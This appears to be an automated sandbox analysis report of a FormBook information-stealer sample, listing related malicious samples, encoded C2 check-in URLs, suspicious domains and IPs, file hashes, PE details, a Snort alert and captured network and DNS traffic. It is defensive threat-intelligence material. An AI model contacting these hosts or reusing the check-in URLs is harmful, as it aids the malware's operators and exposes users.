                                        • www.xn--brger-geld-9db.online/figc/?6l=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAAAgxF9BhmzhOSltDZ55SYKhwT&avT=LL3HRvuxxNvP5
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?BR-=lRhXLbaHBZb&BTVpWDy=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAAAmRYgE9xyDuOk9DZ543AHBwT
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?0DH42bh8=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPABelVZgEMWwXSzvw==&f4=6lrL
                                        quotation.exeGet hashmaliciousBrowse
                                        • www.altruista.one/d0ad/?gF=TDKl5lUp&FBtXzf=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA==
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • www.xn--brger-geld-9db.online/figc/?7nwP2=AV8Xq&m8S=Pt2M/L12wB1N4mtlvBk0/8XP0Cy0Z//wbbtnGokezksYit/rx0ZlM4LWCs4DX1NmdmWEx+JpfJd4tcVknPAAAmRYgE9xyDuOk9DZ543AHBwT

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        www.darkchocolatebliss.comSecuriteInfo.com.Trojan-Spy.MSIL.Agent.17922.28574.exeGet hashmaliciousBrowse
                                        • 54.38.220.85
                                        SecuriteInfo.com.Win64.Malware-gen.22993.9755.exeGet hashmaliciousBrowse
                                        • 54.38.220.85

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        QSC-AG-IPXDEjew.x86.elfGet hashmaliciousBrowse
                                        • 80.190.158.67
                                        Quotation Request - 10001.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        mU1m6ZFe4i.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Payment Adivce_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        WGwBG6VUfG.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        file.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Adivce_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        RFQ# 6000163267.jsGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        africa.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        HSBC Advice_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        Technical specification.jsGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        Impship.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        Purchase List_pdf.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        quotation.exeGet hashmaliciousBrowse
                                        • 89.31.143.1
                                        COGENT-174USrobinbotGet hashmaliciousBrowse
                                        • 38.136.33.70
                                        robinbotGet hashmaliciousBrowse
                                        • 38.136.33.70
                                        New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                        • 38.163.214.169
                                        Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                        • 38.239.92.131
                                        Ziraat Bankasi Swift Mesaji20221129-34221.exeGet hashmaliciousBrowse
                                        • 38.239.92.131
                                        KL7955.imgGet hashmaliciousBrowse
                                        • 206.1.131.23
                                        GyKpRhKQY1.elfGet hashmaliciousBrowse
                                        • 38.211.154.4
                                        kTK22xqEq6.elfGet hashmaliciousBrowse
                                        • 204.7.115.146
                                        7HuJu44thW.elfGet hashmaliciousBrowse
                                        • 38.15.202.230
                                        8kH56VSq58.elfGet hashmaliciousBrowse
                                        • 38.140.31.193
                                        mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4-Centor-mail.us-0LF8-YHCG0N-MBA4.htmlGet hashmaliciousBrowse
                                        • 38.34.185.163
                                        SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                        • 206.233.197.135
                                        sora.arm.elfGet hashmaliciousBrowse
                                        • 140.242.24.234
                                        file.exeGet hashmaliciousBrowse
                                        • 38.239.46.206
                                        Yw0HhtLWAz.elfGet hashmaliciousBrowse
                                        • 149.113.236.91
                                        Mddos.arm7.elfGet hashmaliciousBrowse
                                        • 38.116.142.135
                                        01012341234.apkGet hashmaliciousBrowse
                                        • 154.55.129.163
                                        output(1)(1).jsGet hashmaliciousBrowse
                                        • 38.239.46.206
                                        Wf7o2zH6la.exeGet hashmaliciousBrowse
                                        • 206.233.128.57
                                        SecuriteInfo.com.ELF.Agent-BQZ.23025.8688.elfGet hashmaliciousBrowse
                                        • 66.250.7.181

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\NHYGUnNN.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):226
                                        Entropy (8bit):5.354940450065058
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                        MD5:B10E37251C5B495643F331DB2EEC3394
                                        SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                        SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                        SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                                        C:\Users\user\AppData\Local\Temp\1--Lt08NN

                                        Download File
                                        Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2891393435168748
                                        Encrypted:false
                                        SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                        MD5:037D23498B81732EEAAAD0E8015F3F85
                                        SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                        SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                        SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.833885184563826
                                        TrID:
                                        • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                        • Win64 Executable GUI (202006/5) 44.25%
                                        • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                        • Win64 Executable (generic) (12005/4) 2.63%
                                        • Generic Win/DOS Executable (2004/3) 0.44%
                                        File name:NHYGUnNN.exe
                                        File size:275456
                                        MD5:4f9c8432b57fa1aa875071de547ba947
                                        SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
                                        SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
                                        SHA512:ced221c2e5225a8ead486e52f1c5307b24dbaff8864c7262f2d6f58cad3184753d1f2afe525c3afa122ddcafeab38845dafd2f7a22169bfac026375e7962481d
                                        SSDEEP:6144:RhwendE8+/O+oImP2Qcy7ZwpeA9pg6Cer0K7+UUcT9gxyRClRcOpoik:EAHdP7ZwpeApT0K7+UUQ99RORcOpoR
                                        TLSH:B24401917785748FC98ECF3B86A03859097991733B0BD39B94423CA9491E3DE5E13BA3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......c..............0......0........... ....@...... ....................................`...@......@............... .....

                                        File Icon

                                        Icon Hash:30f0c4ccccc6b010

                                        Static PE Info

                                        General

                                        Entrypoint:0x400000
                                        Entrypoint Section:
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385B386 [Tue Nov 29 07:23:50 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:

                                        Entrypoint Preview

                                        Instruction
                                        dec ebp
                                        pop edx
                                        nop
                                        add byte ptr [ebx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1714.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3e6600x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x416280x41800False0.9183936665076335data7.879743437690199IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .reloc0x440000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc0x460000x17140x1800False0.265625data4.38448712577448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x461300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                        RT_GROUP_ICON0x471d80x14data
                                        RT_VERSION0x471ec0x33cdata
                                        RT_MANIFEST0x475280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.6154.209.6.24149722802829004 11/29/22-18:25:42.914102TCP2829004ETPRO TROJAN FormBook CnC Checkin (POST)4972280192.168.2.6154.209.6.241

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 18:25:06.857711077 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.176563978 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.177164078 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.177280903 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.495994091 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496047974 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496076107 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496227980 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.496602058 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.815313101 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:12.533631086 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.553531885 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.553693056 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.554054976 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.573877096 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576395035 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576421022 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576509953 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:13.563682079 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.580615997 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.601016045 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.601304054 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.601547003 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.621640921 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.621699095 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.623873949 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.623893976 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.626898050 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.647209883 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.647319078 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.654036999 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.675849915 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677865982 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677930117 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677973986 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678021908 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678031921 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678061962 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678066969 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678113937 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678148985 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678157091 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678191900 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678610086 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.698600054 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:21.757518053 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.776348114 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.776595116 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.776768923 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.795433998 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795470953 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795599937 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.783147097 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.801913977 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.803277016 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.821763039 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.821918011 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.822163105 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.840464115 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840503931 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840524912 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.846643925 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865328074 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.865495920 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865695000 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.883969069 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884027958 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884074926 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884263992 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.884419918 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.902769089 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:31.069607019 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.454494953 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:31.454699993 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.457118988 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.221436024 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.471544981 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606439114 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606645107 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606683016 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606717110 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606791973 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.856290102 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.856455088 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:33.490314960 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:36.508388996 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.519331932 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.913681030 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:42.913929939 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.914102077 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.308163881 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:43.308239937 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.925580978 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.097312927 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.491835117 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.491909027 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.492044926 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.494973898 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.942090988 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.283199072 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.283349991 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.330370903 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.330629110 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.330832005 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.718837976 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.718872070 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.718908072 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:45.719166040 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.719367027 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:46.107592106 CET8049723154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:50.809870005 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:50.989680052 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:50.990933895 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:50.991030931 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:51.162309885 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284145117 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284233093 CET8049724162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:51.284377098 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:52.005625010 CET4972480192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.020534992 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.192018986 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.192198038 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.235179901 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:53.406793118 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524674892 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524713993 CET8049725162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:53.524817944 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:54.282042027 CET4972580192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.252006054 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.424319983 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.424472094 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.424715042 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.596029043 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725609064 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725667953 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:25:56.725946903 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.737184048 CET4972680192.168.2.6162.213.255.142
                                        Nov 29, 2022 18:25:56.908736944 CET8049726162.213.255.142192.168.2.6
                                        Nov 29, 2022 18:26:01.776572943 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.797131062 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:01.797245979 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.797384977 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:01.817897081 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036621094 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036678076 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.036843061 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:02.038217068 CET8049727172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:02.041400909 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:02.802215099 CET4972780192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.818989992 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.839960098 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:03.840537071 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.840754986 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:03.861567020 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:03.861615896 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094774008 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094841957 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.094907045 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:04.095092058 CET4972880192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:04.115966082 CET8049728172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:05.864998102 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.882400036 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:05.883270025 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.883320093 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:05.900358915 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166044950 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166151047 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.166302919 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.406423092 CET8049729172.67.148.132192.168.2.6
                                        Nov 29, 2022 18:26:06.406624079 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.406699896 CET4972980192.168.2.6172.67.148.132
                                        Nov 29, 2022 18:26:06.423780918 CET8049729172.67.148.132192.168.2.6

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 18:25:06.826121092 CET5950453192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:06.849574089 CET53595048.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:12.510191917 CET6519853192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:12.532123089 CET53651988.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:21.723710060 CET6291053192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:21.755763054 CET53629108.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:30.897186995 CET6386353192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:31.068085909 CET53638638.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:50.761020899 CET6322953192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:50.808146954 CET53632298.8.8.8192.168.2.6
                                        Nov 29, 2022 18:26:01.743686914 CET6253853192.168.2.68.8.8.8
                                        Nov 29, 2022 18:26:01.772579908 CET53625388.8.8.8192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 29, 2022 18:25:06.826121092 CET192.168.2.68.8.8.80x2214Standard query (0)www.ope-cctv.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:12.510191917 CET192.168.2.68.8.8.80x7524Standard query (0)www.dersameh.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:21.723710060 CET192.168.2.68.8.8.80x2444Standard query (0)www.darkchocolatebliss.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:30.897186995 CET192.168.2.68.8.8.80xa02aStandard query (0)www.y31jaihdb6zm87.buzzA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:50.761020899 CET192.168.2.68.8.8.80xeb7dStandard query (0)www.marketmall.digitalA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.743686914 CET192.168.2.68.8.8.80xd179Standard query (0)www.canadianlocalbusiness.comA (IP address)IN (0x0001)false

                                        DNS Answers

